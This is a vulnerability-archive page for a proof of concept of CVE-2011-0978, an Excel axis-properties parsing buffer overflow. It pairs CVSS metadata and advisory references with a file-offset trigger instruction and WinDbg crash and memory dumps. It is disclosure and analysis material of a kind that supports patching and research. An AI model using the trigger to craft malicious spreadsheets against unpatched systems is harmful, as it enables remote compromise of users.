Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC

2011-05-03 / 2011-05-04

Credit: webDEViL

Risk: High

Local: No

Remote: Yes

CVE: CVE-2011-0978

CWE: CWE-119

CVSS Base Score: 9.3/10

Impact Subscore: 10/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

"""
This is a PoC for MS11-021/CVE-2011-0978
Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow
w3bd3vil[at]gmail[dot].com
twitter.com/w3bd3vil
Modify bits at file location 0x39E7
0:000:x86> r
eax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554
eip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
2f36a2d5 33d2 xor edx,edx
2f36a2d7 53 push ebx
2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h]
2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx
2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch]
2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78)
2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx
2f36a2ed 56 push esi
2f36a2ee 57 push edi
2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95)
2f36a2f5 395514 cmp dword ptr [ebp+14h],edx
2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321)
2f36a2fa 8b4010 mov eax,dword ptr [eax+10h]
2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=????????
2f36a300 3bc2 cmp eax,edx
2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329)
2f36a304 0fb738 movzx edi,word ptr [eax]
2f36a307 8d4c3f02 lea ecx,[edi+edi+2]
2f36a30b 51 push ecx
eax here points to location in the file 0xFB4.
0:000:x86> dd eax
04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318
04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8
04dd63a0 04dd03e0 00000000 00000001 00000001
04dd63b0 00000001 00000001 00000001 00000001
04dd63c0 00000001 00000001 00000001 00000000
04dd63d0 00000000 00000000 00000000 00000000
04dd63e0 00000000 00000000 00000000 00000000
04dd63f0 00000000 00000000 00000000 00000000
0:000:x86> dd 0376ec80
0376ec80 00630009 0061006c 00730073 006f0077
0376ec90 006b0072 eaf10000 00770009 00720061
0376eca0 0075006d 00200070 00350023 eaf10000
0376ecb0 0283eb30 6666ce60 0283eb40 6666c960
0376ecc0 0283eb4c 6666c960 0000f80c 00000000
0376ecd0 00006338 00000000 00000001 00000000
0376ece0 0283eb98 6666ce60 0283eba4 6666c960
0376ecf0 0283ebb0 6666c960 00000000 00000000
webDEViL

References:

http://zerodayinitiative.com/advisories/ZDI-11-042/

http://www.vupen.com/english/advisories/2011/0940

http://www.securitytracker.com/id?1025337

http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx

http://secunia.com/advisories/43232

http://secunia.com/advisories/39122

http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-microsoft

http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12439

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.